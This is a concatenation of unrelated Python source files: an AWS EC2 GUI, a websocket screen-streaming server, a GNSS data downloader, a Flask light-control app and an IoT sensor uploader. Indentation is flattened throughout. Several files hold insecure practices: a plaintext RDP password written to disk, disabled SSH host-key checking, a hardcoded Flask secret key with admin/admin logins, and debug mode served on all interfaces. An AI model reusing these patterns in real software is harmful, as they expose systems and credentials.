logging.error('呼叫 API 錯誤: %s' % apiResponse['ResponseMetadata']['HTTPStatusCode'])
# === 關機 ===
def setStopped(self):
if self.status == 'running':
apiResponse = self.client.stop_instances(InstanceIds = [self.instanceID,])
if apiResponse['ResponseMetadata']['HTTPStatusCode'] != 200:
logging.error('呼叫 API 錯誤: %s' % apiResponse['ResponseMetadata']['HTTPStatusCode'])
# === 建立 Tk 圖形界面 uiWidgets 物件 =======
class uiWidgets:
def __init__(self, master):
self.master = master
self.master.geometry("%dx%d-%d-%d" % (330, 302, 50, 80))
self.master.resizable(False, False)
self.master.title('%s/%s' % (ec2.configFile, ec2.profileName[ec2.profileName.rfind(' ')+1:]))
# === 建立圖形界面裡會顯示的變數 =======
self.startORstop = StringVar()
self.showStatus = StringVar()
self.makeConnection = StringVar()
self.showFQDN = StringVar()
self.showIP = StringVar()
# === 建立開關機計數器變數 =======
self.counter = 0
# === 建立 [設定檔] === User Profile 框架 =======
self.userprofileFrame = LabelFrame(self.master, text = '設定檔')
# === 建立 [設定檔] instance ID 標籤與文字 =======
self.identiferLabel = Label(self.userprofileFrame, text = '載入的 EC2 Inatance ID')
self.identiferLabel.grid(row = 0, column = 0)
self.identiferText = Entry(self.userprofileFrame)
self.identiferText.grid(row = 0, column = 1)
# === 建立 [設定檔] region 標籤與文字 =======
self.regionalLabel = Label(self.userprofileFrame, text = '該 EC2 Inatance 的 Region')
self.regionalLabel.grid(row = 1, column = 0)
self.regionalText = Entry(self.userprofileFrame)
self.regionalText.grid(row = 1, column = 1)
# === 定位 [設定檔] 包裝 User Profile 框架 Frame =======
self.userprofileFrame.pack(padx = 10, pady = 5, ipadx = 5, ipady = 5)
# === 插入 [EC2 的 instance ID 文字] 到文字框 =======
self.identiferText.insert(0, ec2.instanceID)
# === 插入 [EC2 的 user region 文字] 到文字框 =======
self.regionalText.insert(0, ec2.userRegion)
# === 建立 [開/關機] start/stop switch 按鈕 =======
self.switchButton = Button(self.master, textvariable = self.startORstop, width = 10, command = self.switchbuttonClicked)
# === 定位 [開/關機] start/stop switch 按鈕 =======
self.switchButton.pack(padx = 10, pady = 5)
# === 建立 [目前狀態] instance state 框架 Frame =======
self.instancestatusFrame = LabelFrame(self.master, text = '目前狀態')
# === 建立 [目前狀態] instance state 標籤與文字 =======
self.machinestateLabel = Label(self.instancestatusFrame, text = '目前的 EC2 Inatance 狀態')
self.machinestateLabel.grid(row = 0, column = 0)
self.machinestateText = Entry(self.instancestatusFrame, textvariable = self.showStatus) # 顯示 [EC2 Instance(虛擬機器) 的 State]
self.machinestateText.grid(row = 0, column = 1)
# === 定位 [目前狀態] 包裝 instance state 框架 Frame =======
self.instancestatusFrame.pack(padx = 10, pady = 5, ipadx = 5, ipady = 5)
# === 建立 [細節] instance description 框架 Frame =======
self.statisticsFrame = LabelFrame(self.master, text = '細節')
# === 建立 [細節] instance fqdn 標籤與文字 =======
self.instanceFQDNLable = Label(self.statisticsFrame , text = '目前 EC2 Inatance 的 FQDN')
self.instanceFQDNLable.grid(row = 0, column = 0)
self.instanceFQDNNameText = Entry(self.statisticsFrame , textvariable = self.showFQDN) # 顯示 [EC2 Instance(虛擬機器) 的 FQDN]
self.instanceFQDNNameText.grid(row = 0, column = 1)
# === 建立 [細節] instance ip addr 標籤與文字 =======
self.instanceIPaddrLable = Label(self.statisticsFrame , text = '目前 EC2 Inatance 的 IP')
self.instanceIPaddrLable.grid(row = 1, column = 0)
self.instanceIPaddrText = Entry(self.statisticsFrame , textvariable = self.showIP) # 顯示 [EC2 Instance(虛擬機器) 的 IP]
self.instanceIPaddrText.grid(row = 1, column = 1)
# === 定位 [細節] 包裝 instance description 框架 Frame =======
self.statisticsFrame.pack(padx = 10, pady = 5, ipadx = 5, ipady = 5)
# === 建立 [連線伺服器] make connection 按鈕 =======
self.connectButton = Button(self.master, textvariable = self.makeConnection, width = 10, command = self.connectbuttonClicked)
# === 定位 [連線伺服器] make connection 按鈕 =======
self.connectButton.pack(padx = 10, pady = 5)
# === 更新所有顯示變數 =======
self.variablesRefreshing()
# === 更新變數 ===
def variablesRefreshing(self):
ec2.getStastictics()
if ec2.status in ['running', 'stopped']:
if ec2.status == 'running':
self.startORstop.set('關機 [Stop]')
self.makeConnection.set('連線伺服器')
elif ec2.status == 'stopped':
self.startORstop.set('開機 [Start]')
self.makeConnection.set(' - 尚未開機 - ')
else:
self.makeConnection.set(' - - - - - ')
self.showStatus.set(ec2.status) # EC2 Instance(虛擬機器) 狀態
self.showFQDN.set(ec2.fqdn) # EC2 Instance(虛擬機器) 的公開 FQDN 位址
self.showIP.set(ec2.ip) # EC2 Instance(虛擬機器) 的公開 IP 位址
def executeTerminal(self):
os.system(self.cmd2exec)
# === 連線按鈕 ===
def connectbuttonClicked(self):
if ec2.status == 'running':
if ec2.accountPwd.lower().endswith('.pem'):
self.cmd2exec = 'ssh -o "ServerAliveInterval 40" -o StrictHostKeyChecking=no -i "%s" ubuntu@%s' % (ec2.accountPwd, ec2.fqdn)
else:
self.cmd2exec = 'cmdkey /generic:%ec2IP% /user:Administrator /pass:"' + ec2.accountPwd + '" && mstsc /admin /v:%ec2IP%'
try:
with open(os.path.expanduser(r'~/.aws/executedCmd.%s.txt' % ec2.configFile), 'w', encoding='utf-8-sig') as f:
f.write(self.cmd2exec) # 將命令列寫入檔案, ** 注意 rdp 包含密碼的明碼
except Exception:
logging.warning('執行下列命令寫入桌面檔案錯誤: %s' % self.cmd2exec)
os.environ['ec2IP'] = ec2.ip
cmd = threading.Thread(target=self.executeTerminal)
cmd.start()
logging.debug('外部命令視窗啟動是否啟動? %s' % cmd.is_alive())
# === 開關機按鈕 ===
def switchbuttonClicked(self):
if ec2.status in ['running', 'stopped']:
if ec2.status == 'running': # 如果伺服器EC2 Instance 為啟動中
ec2.setStopped() # ->則關機
elif ec2.status == 'stopped':
ec2.setRunning() # ->否則開機
self.countingBtn()
# === 按下開關機按鈕後計數 ===
def countingBtn(self):
self.counter += 1 # 增加計數
self.startORstop.set('- - %s - -' % str(self.counter)) # 顯示計數內容
self.variablesRefreshing() # 更新畫面上的變數
if ec2.status not in ['running', 'stopped']: # 如果狀態已為開或關機表示作業完成
self.btnSwitchId = self.switchButton.after(2000, self.switchbuttonClicked) # 否則排定下個2秒(=2000ms)就再更新畫面一次
else:
self.counter = 0
self.switchButton.after_cancel(self.btnSwitchId) # 所以取消每2秒更新一次的動作
# === 主程式 ==========
if __name__ == '__main__':
accountProfile = get_awsconfig()
if accountProfile:
ec2 = ec2Instance(accountProfile)
# You should check if ec2.client is NOT <None> before you do anything with ec2Instance.
# 由於 ec2 在啟始時如果沒有 aws credential, ec2.client 設定為 None. 如果為 None 則程式應該結束
if ec2.client:
root = Tk()
appLayout = uiWidgets(root)
root.mainloop()
|
server2.py
|
import tornado.websocket
import tornado.ioloop
import tornado.web
import cv2
import numpy as np
import time
import ctypes
import threading
import multiprocessing
import random
import sys
from PyQt5 import QtWidgets
from PyQt5.QtCore import QThread, pyqtSignal
from PyQt5.QtGui import QImage, QPixmap
from PyQt5.uic import loadUi
import qtvideo as qv
connect_users = set()
tickx = 0
timestart = 0
ticks = 0
def solveQps():
global tickx
global timestart
tickx += 1
if tickx == 60:
sec = time.time() - timestart
fps = round(tickx / sec, 1)
timestart = time.time()
tickx = 0
print(f'fps={fps}')
return True
def saveabp(message):
with open(f'./frame/message.bin', 'ab+') as f:
f.write(message)
websocketPackageNum = 0
drawNum = 0
maxNum = 0
class MyWebSocketHandler(tornado.websocket.WebSocketHandler):
connect_users = set()
def check_origin(self, origin: str):
'''重写同源检查 解决跨域问题'''
return True
def open(self):
print("WebSocket opened")
# 打开连接时将用户保存到connect_users中
self.connect_users.add(self)
def solveMessage(self, message):
print(message)
def on_message(self, message):
global websocketPackageNum
global dll
messageType = type(message)
# if messageType!=type(b""):
# self.solveMessage(message)
# return
lenmessage = len(message)
global maxNum
if lenmessage > maxNum:
print(f"大包{lenmessage}")
maxNum = lenmessage
# print(f"websocket len={lenmessage}")
inputTime1 = time.time()
dll.inputBuff(message, len(message))
websocketPackageNum += 1
if random.random() > 0.99:
print(f"buffinput耗时={round((time.time() - inputTime1) * 1000)}")
# frame = np.frombuffer(message, 'uint8')
# length = len(frame)
# print(length)
# if length > 20:
#
# else:
# print("jump")
# print(f"message len {length}")
# print(frame)
# print(image)
# print('收到的信息为:')
# exit(0)
def on_close(self):
print("WebSocket closed")
# 关闭连接时将用户从connect_users中移除
self.connect_users.remove(self)
def check_origin(self, origin):
# 此处用于跨域访问
return True
@classmethod
def send_demand_updates(cls, message):
# 使用@classmethod可以使类方法在调用的时候不用进行实例化
# 给所有用户推送消息(此处可以根据需要,修改为给指定用户进行推送消息)
for user in cls.connect_users:
user.write_message(message)
class Application(tornado.web.Application):
def __init__(self):
handlers = [
(r'/ws', MyWebSocketHandler)
]
tornado.web.Application.__init__(self, handlers)
# dlls=["lib/avutil-56.dll"]
# for d in dlls:
# ctypes.cdll.LoadLibrary(d)
# import sys
# p=os.path.abspath(os.path.join(os.path.curdir,"lib"))
# sys.path.append(p)
# d=['swresample-3.dll',"swscale-5.dll","avutil-56.dll","avcodec-58.dll","avformat-58.dll",'server8.dll']
# for dd in d:
# funcs=[ctypes.windll.LoadLibrary,ctypes.cdll.LoadLibrary,ctypes.CDLL,ctypes.WinDLL]
# for fun in funcs:
# try:
# fun(dd)
# print(f"{dd}成功")
# break
# except:
# pass
import os
d=["avutil-56.dll",'swresample-3.dll',"swscale-5.dll","avcodec-58.dll","avformat-58.dll",'server8.dll']
for dd in d:
funcs=[ctypes.windll.LoadLibrary,ctypes.cdll.LoadLibrary,ctypes.CDLL,ctypes.WinDLL]
for fun in funcs:
try:
fun(os.path.abspath(os.path.join("./lib",dd)))
print(f"{dd}成功")
break
except:
pass
dll = ctypes.cdll.LoadLibrary( os.path.abspath('./lib/server8.dll'))
# height = 1280
# width = 720
# height = 2220
# width = 1080
FPS = 11
SHAPE = 444
import cmath
import matplotlib.pyplot as plt
import win32api, win32con
screenX = win32api.GetSystemMetrics(win32con.SM_CXSCREEN) # 获得屏幕分辨率X轴
screenY = win32api.GetSystemMetrics(win32con.SM_CYSCREEN)
def autosize(screenY, screenX, picw, pich):
minsize = min(screenY, screenX)*0.9
maxsize = max(picw, pich)
if maxsize > minsize:
rate = minsize / maxsize
return (int(picw * rate//2*2), int(pich * rate//2*2))
else:
return (picw, pich)
from qtvideo import mywin
from socketserver3 import MysocketServer
threadImg = None
class Mythread(QThread):
breakSignal = pyqtSignal(int)
def __init__(self, queue, size):
super().__init__()
# 下面的初始化方法都可以,有的python版本不支持
# super(Mythread, self).__init__()
self.queue = queue
self.scrSize = size
def run(self):
global dll
# 启动socket通信
while True:
size = self.queue.get()
if size.get("size"):
size = size.get("size")
break
else:
self.queue.put(size)
print("ImageThread启动")
w, h = size
print(f"拿到了w={w}h={h}")
scrw, scrh = autosize(self.scrSize[0], self.scrSize[1], w, h)
print(f"自适应分辨率{scrw}x{scrh}")
# scrw,scrh=w,h
global drawNum
global threadImg
dll.init(0, w, h, scrw, scrh)
lastTime = time.time()
print(screenX, screenY)
# cv2.namedWindow("1", flags=cv2.WINDOW_NORMAL | cv2.WINDOW_KEEPRATIO)
# cv2.resizeWindow("1", scrw, scrh)
tick = 0
bufflen = scrw * scrh * 3
global FPS
buff = ctypes.c_buffer(bufflen)
while True:
try:
drawNum += 1
tick += 1
buffLen = dll.getBuff(buff)
frame = np.frombuffer(buff.raw, 'uint8', count=bufflen)
lenx = len(frame)
solveQps()
img = frame.reshape((scrh, scrw, 3)).astype('uint8')
qv.imageT = img
self.breakSignal.emit(1)
except Exception as e:
print(e)
pass
def hackSocket():
id = 0
with open(f'./frame/message.bin', 'rb') as f:
while f.readable():
message = f.read(200000)
time.sleep(10)
if len(message) <= 1:
break
dll.inputBuff(message, len(message))
id += 1
print(f"包id{id}")
hack = 0
def mainx():
if hack == 2:
pass
elif hack == 1:
t = threading.Thread(target=hackSocket)
t.start()
# cvT.join()
# t.join()
else:
# cvT = threading.Thread(target=cvThread, args=(0,))
# cvT.start()
# app = Application()
# app.listen(20482)
# tornado.ioloop.IOLoop.current().start()
from socketserver3 import MysocketServer
server = MysocketServer("", 20481, dll)
server.start()
app = QtWidgets.QApplication(sys.argv)
window = mywin()
threadx = Mythread()
threadx.breakSignal.connect(window.loadimage)
threadx.start()
window.show()
# window.setGeometry(100,100,400,300)
sys.exit(app.exec_())
#
#
# print("cvThread函数")
# cvThread(0)
server.join()
# cvT.join()
dll.wait()
# else:
if __name__ == "__main__":
if hack == 0:
import buildAndroid2
mul2 = multiprocessing.Process(target=buildAndroid2.mainx)
mul2.start()
mainx()
else:
mainx()
|
http_downloader.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import threading
from ftp_downloader import downloader
from gtime import GTime, GT_list
import pandas as pd
import requests
from queue import Queue
import fcntl
import logging
import time
# TODO: to a package
class HTTP_Downloader():
def __init__(self, threads=2):
self.headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36",
"Cookie": ""
}
self.threads = threads
self.log = True
def _download_url(self):
# download url [call by threads]
while True:
url = self.queue.get()
file_name = url.split('/')[-1]
save = self.out + os.sep + file_name
if (not self.overwrite) and os.path.exists(save):
self.queue.task_done()
continue
try:
with open(save, 'wb') as f:
fcntl.flock(f,fcntl.LOCK_EX | fcntl.LOCK_NB) # lock file
response = requests.get(url,headers=self.headers)
f.write(response.content)
fcntl.flock(f,fcntl.LOCK_UN) # release lock
f.close()
print('{} -> {}'.format(url, save))
except:
print('Error when downloading {} -> {}'.format(url, save))
if self.log:
logging.warning('Error when downloading {} -> {}'.format(url, save))
if os.path.getsize(save) == 0:
# remove 0 size file
os.remove(save)
self.queue.task_done()
def download_by_urls(self, urls, out='.', overwrite=False):
# download url list by muti-threading
if isinstance(urls, str):
urls = [urls] # change to list
self.out = os.path.realpath(out)
self.overwrite = overwrite
# threads list and queue
thread_list = []
self.queue = Queue()
# put urls to queue
for url in urls:
self.queue.put(url)
print('All URL generated, Downloading...')
# start threads
for i in range(self.threads):
t_parse = threading.Thread(target=self._download_url)
thread_list.append(t_parse)
t_parse.setDaemon(True)
t_parse.start()
# wait until all tasks done
self.queue.join()
return
def main():
"""
Example 1:A simple download
Result: cddis.gsfc.nasa.gov
# /pub/gps/products/2086/igs20864.sp3.Z -> ./igs/igs20864.sp3.Z
# /pub/gps/products/2086/igs20863.sp3.Z -> ./igs/igs20863.sp3.Z
# /pub/gps/products/2086/igs20865.sp3.Z -> ./igs/igs20865.sp3.Z
"""
# 1. Declare a downloader
ftp = downloader()
dl = HTTP_Downloader(threads=10)
# 2. Make the request dictionary
# GNSS Time list
# year 2014-2018
gtl = GT_list(GTime(year=2019,doy=1), GTime(year=2019,doy=365))
# Make request dict
d = {
'GTIME': gtl
}
# 3. URL pattern
p='https://cddis.nasa.gov/archive/gnss/products/ionex/YYYY/DDD/igsgDDD0.YYi.Z'
# 4. Output directory (optional)
out_dir = '/mnt/e/IGS_GIM/igs'
# 5. Url lists
url_list = ftp.generate_urls(pattern=p,dic=d)
# print(url_list)
dl.download_by_urls(url_list, out_dir)
if __name__ == "__main__":
main()
|
Light_Control.py
|
from flask import Flask, g, render_template, request, session, url_for, redirect
import time
import datetime
import threading
import csv
app = Flask(__name__)
app.secret_key = 'somesecretkeythatonlyishouldknow'
app.session_cookie_name = 'MyBeautifulCookies'
authorize_ip = ["localhost", "127.0.0.1", "172.16.32.199"]
buttonSts_p1 = ["/static/img/img_off.png"] * 8
buttonSts_p2 = ["/static/img/img_off.png"] * 8
color = ["#333333"] * 8
class User:
def __init__(self, id, username, password):
self.id = id
self.username = username
self.password = password
def __repr__(self):
return f'<User: {self.username}>'
users = []
users.append(User(id=1, username='elo', password='elo'))
users.append(User(id=2, username='admin', password='admin'))
def getTime():
t = time.localtime()
current_time = time.strftime("%H:%M", t)
return current_time
@app.before_request
def before_request():
g.user = None
ip = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
for i in authorize_ip:
if ip == i:
if 'user_id' in session:
user = [x for x in users if x.id == session['user_id']][0]
g.user = user
else :
users.append(User(id=3, username='local', password='local'))
user = [x for x in users if x.id == 3][0]
session['user_id'] = user.id
user = [x for x in users if x.id == session['user_id']][0]
g.user = user
return redirect(url_for('page1'))
if 'user_id' in session:
user = [x for x in users if x.id == session['user_id']][0]
g.user = user
@app.route("/", methods=['POST', 'GET'])
def login():
current_time = getTime()
if request.method == 'POST':
session.pop('user_id', None)
username = request.form['username']
password = request.form['password']
try:
user = [x for x in users if x.username == username][0]
try:
if user and user.password == password:
session['user_id'] = user.id
return redirect(url_for('page1'))
except:
return redirect(url_for('login'))
except:
return redirect(url_for('login'))
return render_template("login.html", time=current_time)
@app.route("/page1", methods = ['POST', 'GET'])
def page1():
current_time = getTime()
if not g.user:
return redirect(url_for('login'))
if all(elem == "/static/img/img_on.png" for elem in buttonSts_p1):
buttonSts_p2[0] = "/static/img/img_on.png"
else:
buttonSts_p2[0] = "/static/img/img_off.png"
if request.method == 'POST':
if request.form['button_p1'] == '1':
if buttonSts_p1[0] == "/static/img/img_on.png":
buttonSts_p1[0] = "/static/img/img_off.png"
color[0] = "#333333"
else:
buttonSts_p1[0] = "/static/img/img_on.png"
color[0] = "#FFFFFF"
elif request.form['button_p1'] == '2':
if buttonSts_p1[1] == "/static/img/img_on.png":
buttonSts_p1[1] = "/static/img/img_off.png"
color[1] = "#333333"
else:
buttonSts_p1[1] = "/static/img/img_on.png"
color[1] = "#FFFFFF"
elif request.form['button_p1'] == '3':
if buttonSts_p1[2] == "/static/img/img_on.png":
buttonSts_p1[2] = "/static/img/img_off.png"
color[2] = "#333333"
else:
buttonSts_p1[2] = "/static/img/img_on.png"
color[2] = "#FFFFFF"
elif request.form['button_p1'] == '4':
if buttonSts_p1[3] == "/static/img/img_on.png":
buttonSts_p1[3] = "/static/img/img_off.png"
color[3] = "#333333"
else:
buttonSts_p1[3] = "/static/img/img_on.png"
color[3] = "#FFFFFF"
elif request.form['button_p1'] == '5':
if buttonSts_p1[4] == "/static/img/img_on.png":
buttonSts_p1[4] = "/static/img/img_off.png"
color[4] = "#333333"
else:
buttonSts_p1[4] = "/static/img/img_on.png"
color[4] = "#FFFFFF"
elif request.form['button_p1'] == '6':
if buttonSts_p1[5] == "/static/img/img_on.png":
buttonSts_p1[5] = "/static/img/img_off.png"
color[5] = "#333333"
else:
buttonSts_p1[5] = "/static/img/img_on.png"
color[5] = "#FFFFFF"
elif request.form['button_p1'] == '7':
if buttonSts_p1[6] == "/static/img/img_on.png":
buttonSts_p1[6] = "/static/img/img_off.png"
color[6] = "#333333"
else:
buttonSts_p1[6] = "/static/img/img_on.png"
color[6] = "#FFFFFF"
elif request.form['button_p1'] == '8':
if buttonSts_p1[7] == "/static/img/img_on.png":
buttonSts_p1[7] = "/static/img/img_off.png"
color[7] = "#333333"
else:
buttonSts_p1[7] = "/static/img/img_on.png"
color[7] = "#FFFFFF"
elif request.form['button_p1'] == 'page_2':
return render_template('page2.html', button=buttonSts_p2, color=color, time=current_time)
else:
pass
return render_template('page1.html', button=buttonSts_p1, color=color, time=current_time)
@app.route("/page2", methods = ['POST', 'GET'])
def page2():
current_time = getTime()
if not g.user:
return redirect(url_for('login'))
if request.method == 'POST':
if request.form['button_p1'] == '1':
buttonSts_p2[0] = "/static/img/img_on.png"
for i in range(8):
buttonSts_p1[i] = "/static/img/img_on.png"
color[i] = "#FFFFFF"
elif request.form['button_p1'] == '2':
buttonSts_p2[1] = "/static/img/img_off.png"
for i in range(8):
buttonSts_p1[i] = "/static/img/img_off.png"
buttonSts_p2[i] = "/static/img/img_off.png"
color[i] = "#333333"
elif request.form['button_p1'] == '3':
buttonSts_p2[0] = "/static/img/img_off.png"
buttonSts_p2[1] = "/static/img/img_off.png"
for i in range(0, 8, 2):
color[i] = "#FFFFFF"
color[i + 1] = "#333333"
buttonSts_p1[i] = "/static/img/img_on.png"
buttonSts_p1[i + 1] = "/static/img/img_off.png"
elif request.form['button_p1'] == '4':
buttonSts_p2[0] = "/static/img/img_off.png"
buttonSts_p2[1] = "/static/img/img_off.png"
for i in range(0, 8):
if i < 3:
color[i] = "#FFFFFF"
buttonSts_p1[i] = "/static/img/img_on.png"
else :
color[i] = "#333333"
buttonSts_p1[i] = "/static/img/img_off.png"
elif request.form['button_p1'] == '5':
buttonSts_p2[0] = "/static/img/img_off.png"
buttonSts_p2[1] = "/static/img/img_off.png"
for i in range(0, 8):
if i > 3 and i != 7:
color[i] = "#FFFFFF"
buttonSts_p1[i] = "/static/img/img_on.png"
else:
color[i] = "#333333"
buttonSts_p1[i] = "/static/img/img_off.png"
elif request.form['button_p1'] == 'page_1':
return render_template('page1.html', button=buttonSts_p1, color=color, time=current_time)
else:
pass
return render_template('page2.html', button=buttonSts_p2, color=color, time=current_time)
@app.route("/settings", methods = ['POST', 'GET'])
def settings(setting=None):
if g.user.id == 3:
return redirect(url_for('page1'))
if not g.user.username == "admin":
return redirect(url_for('login'))
current_time = getTime()
if request.method == 'POST':
check1 = request.form.get('Auto on')
time1 = request.form.get('time Auto on')
check2 = request.form.get('Auto off')
time2 = request.form.get('time Auto off')
file = open('config.csv', "w", newline='')
header = ['name','state','param1']
csvf = csv.DictWriter(file, fieldnames=header)
csvf.writeheader()
csvf.writerow({'name': 'Auto on', 'state': check1, 'param1': time1})
csvf.writerow({'name': 'Auto off', 'state': check2, 'param1': time2})
file.close()
return redirect(url_for('page1'))
with open('config.csv', "r") as f:
csvreader = csv.reader(f)
header = next(csvreader)
rows = []
for row in csvreader:
rows.append(row)
f.close()
return render_template('settings.html', time=current_time, settings=rows)
@app.before_first_request
def activate_job():
def run_job():
while True:
t = getTime()
with open('config.csv', "r") as f:
csvreader = csv.reader(f)
header = next(csvreader)
rows = []
for row in csvreader:
rows.append(row)
f.close()
day = datetime.datetime.today().weekday()
#0 monday / 6 sunday
if rows[0][1] == 'on' and t == rows[0][2] and day < 5:
print("Auto on")
if rows[1][1] == 'on' and t == rows[1][2] and day < 5:
print("Auto off")
time.sleep(60)
thread = threading.Thread(target=run_job)
thread.start()
if __name__ == "__main__":
app.run(host='0.0.0.0', port=80, debug=True,)
|
sensor_offline_storage.py
|
from Queue import Queue
from threading import Thread, Semaphore
import sys
import os
import time
import urllib2
import json
import boto3
import hashlib
import binascii
import pycurl
from OpenSSL import SSL
import random
import datetime
import zymkey
# Global variables for the script
LOGFILE_NAME = 'log.txt'
TOPIC = 'Zymkey'
DEVICE_ID = '1'
IP = '192.168.12.28'
DATA_SEP = '---NEW ITEM---'
FAIL_THRESHOLD = 100
failQ = Queue() # The queue of JSON objects that failed to upload
qSem = Semaphore() # The semaphore for putting and getting from the queue
rwSem = Semaphore() # The semaphore for reading and writing from the log
# Create a log.txt file if it doesn't already exist
cur_dir = os.path.dirname(os.path.realpath(__file__))
log_path = os.path.join(cur_dir, LOGFILE_NAME)
if not os.path.isfile(log_path):
f = open(log_path,"w+")
f.close()
# Variables to setup the AWS endpoint for publishing data
boto3client = boto3.client('iot')
AWS_ENDPOINT = "https://" + str(boto3client.describe_endpoint()['endpointAddress']) + ":8443/topics/" + TOPIC + "?qos=1"
# Function using pycurl to upload data to the topic
def ZK_AWS_Publish(url, post_field, CA_Path, Cert_Path,):
#Setting Curl to use zymkey_ssl engine
c = pycurl.Curl()
c.setopt(c.SSLENGINE, "zymkey_ssl")
c.setopt(c.SSLENGINE_DEFAULT, 1L)
c.setopt(c.SSLVERSION, c.SSLVERSION_TLSv1_2)
#Settings certificates for HTTPS connection
c.setopt(c.SSLENGINE, "zymkey_ssl")
c.setopt(c.SSLCERTTYPE, "PEM")
c.setopt(c.SSLCERT, Cert_Path)
c.setopt(c.CAINFO, CA_Path)
#setting endpoint and HTTPS type, here it is a POST
c.setopt(c.URL, url)
c.setopt(c.POSTFIELDS, post_field)
#Telling Curl to do client and host authentication
c.setopt(c.SSL_VERIFYPEER, 1)
c.setopt(c.SSL_VERIFYHOST, 2)
#Turn on Verbose output and set key as placeholder, not actually a real file.
c.setopt(c.VERBOSE, 0)
c.setopt(c.SSLKEYTYPE, "ENG")
c.setopt(c.SSLKEY, "nonzymkey.key")
c.setopt(c.TIMEOUT, 2)
try:
c.perform()
return 0
except Exception as e:
return -1
# Checking if we can connect to one of Google's IP to check if our internet connection is up
def internet_on():
try:
urllib2.urlopen('http://216.58.192.142', timeout=2)
return True
except urllib2.URLError as err:
return False
except Exception as e:
print(e)
# This thread would check for any data failed to publish from the failQ queue and write it to a log file
def checkFailQueue():
global internetOn
while True:
qSem.acquire()
if failQ.qsize() > FAIL_THRESHOLD or (internetOn and (failQ.qsize() is not 0)):
print('Queue has reached size ' + str(failQ.qsize()))
rwSem.acquire()
with open(log_path, "a") as myfile:
numObjects = 0
while failQ.qsize() > 0:
data = failQ.get()
myfile.write(DATA_SEP + '\n' + data + '\n') # Separate each data object by a characteristic line
numObjects += 1
print('Wrote ' + str(numObjects) + ' items from queue to log')
rwSem.release()
qSem.release()
# This thread will check the log file for any failed events and retry sending them
def retrySend():
global internetOn
while True:
rwSem.acquire()
if internetOn: # Connection is alive
if not os.stat(log_path).st_size == 0: # There is data that needs to reupload
numPublish = 1
with open(log_path) as f:
next(f) # Skip the first DATA_SEP tag
dataBuilder = ''
json_data = ''
for line in f:
line.rstrip() # Strip newline characters
if DATA_SEP not in line:
dataBuilder += line # Build up the JSON payload line by line of file
else:
json_data = dataBuilder # Reached the data separator string so now we store dataBuilder as the json data
print('RETRY ITEM ' + str(numPublish) + ': ' + json_data)
if ZK_AWS_Publish(url=AWS_ENDPOINT, post_field=json_data, CA_Path='/home/pi/Zymkey-AWS-Kit/bash_scripts/CA_files/zk_ca.pem', Cert_Path='/home/pi/Zymkey-AWS-Kit/zymkey.crt') is not -1:
print('\tRETRY PUBLISH item ' + str(numPublish) + ' from retry\n')
else:
print('Couldnt publish ' + str(numPublish) + ', added to queue')
failQ.put(json_data)
numPublish += 1
dataBuilder = '' # Reset the dataBuilder to empty string
# Print out the very last item in the file
json_data = dataBuilder
print('RETRY ITEM ' + str(numPublish) + ': ' + json_data)
if ZK_AWS_Publish(url=AWS_ENDPOINT, post_field=json_data, CA_Path='/home/pi/Zymkey-AWS-Kit/bash_scripts/CA_files/zk_ca.pem', Cert_Path='/home/pi/Zymkey-AWS-Kit/zymkey.crt') is not -1:
print('\tRETRY PUBLISH item ' + str(numPublish) + ' from retry\n')
else:
print('Couldnt publish ' + str(numPublish) + ' added to queue')
failQ.put(json_data)
f = open(log_path, 'w+') # Create a new blank log.txt for new logging
f.close()
rwSem.release()
time.sleep(3) # Retrying the publish because isn't too essential to do in quick time
failThread = Thread(target = checkFailQueue)
retryThread = Thread(target = retrySend)
failThread.daemon = True
retryThread.daemon = True
internetOn = internet_on()
failThread.start()
retryThread.start()
try:
while True:
# Generate the sample data to try to send
timestamp = datetime.datetime.now()
temp_data = {"tempF": random.randint(70,100), "tempC" : random.randint(35, 50)}
encrypted_data = zymkey.client.lock(bytearray(json.dumps(temp_data)))
signature = zymkey.client.sign(encrypted_data)
data = {"ip": IP, "signature": binascii.hexlify(signature), "encryptedData": binascii.hexlify(encrypted_data), "tempData": temp_data}
post_field = {"deviceId": DEVICE_ID, "timestamp": str(timestamp), "data": data}
json_data = json.dumps(post_field)
if not internet_on():
internetOn = False
qSem.acquire()
print('No connection detected...putting the data into offline storage')
failQ.put(json_data)
qSem.release()
else:
internetOn = True
print('REGULAR PUBLISH item: ' + json_data)
if ZK_AWS_Publish(url=AWS_ENDPOINT, post_field=json_data, CA_Path='/home/pi/Zymkey-AWS-Kit/bash_scripts/CA_files/zk_ca.pem', Cert_Path='/home/pi/Zymkey-AWS-Kit/zymkey.crt') is -1:
failQ.put(json_data)
print('\tREGULAR PUBLISH: Fail queue size: ' + str(failQ.qsize()) + '\n')
except KeyboardInterrupt:
print('Exiting...')
sys.exit()
|
local_executor.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Local based implementation of the executor using multiprocessing"""
import signal
from multiprocessing import Process, Queue
try:
from queue import Empty
except ImportError:
from Queue import Empty
try:
import psutil
except ImportError:
psutil = None
from . import executor
def kill_child_processes(parent_pid, sig=signal.SIGTERM):
"""kill all child processes recursively"""
try:
parent = psutil.Process(parent_pid)
except psutil.NoSuchProcess:
return
children = parent.children(recursive=True)
for process in children:
try:
process.send_signal(sig)
except psutil.NoSuchProcess:
return
def _execute_func(func, queue, args, kwargs):
"""execute function and return the result or exception to a queue"""
try:
res = func(*args, **kwargs)
except Exception as exc: # pylint: disable=broad-except
res = exc
queue.put(res)
def call_with_timeout(queue, timeout, func, args, kwargs):
"""A wrapper to support timeout of a function call"""
# start a new process for timeout (cannot use thread because we have c function)
p = Process(target=_execute_func, args=(func, queue, args, kwargs))
p.start()
p.join(timeout=timeout)
queue.put(executor.TimeoutError())
kill_child_processes(p.pid)
p.terminate()
p.join()
class LocalFuture(executor.Future):
"""Local wrapper for the future
Parameters
----------
process: multiprocessing.Process
process for running this task
queue: multiprocessing.Queue
queue for receiving the result of this task
"""
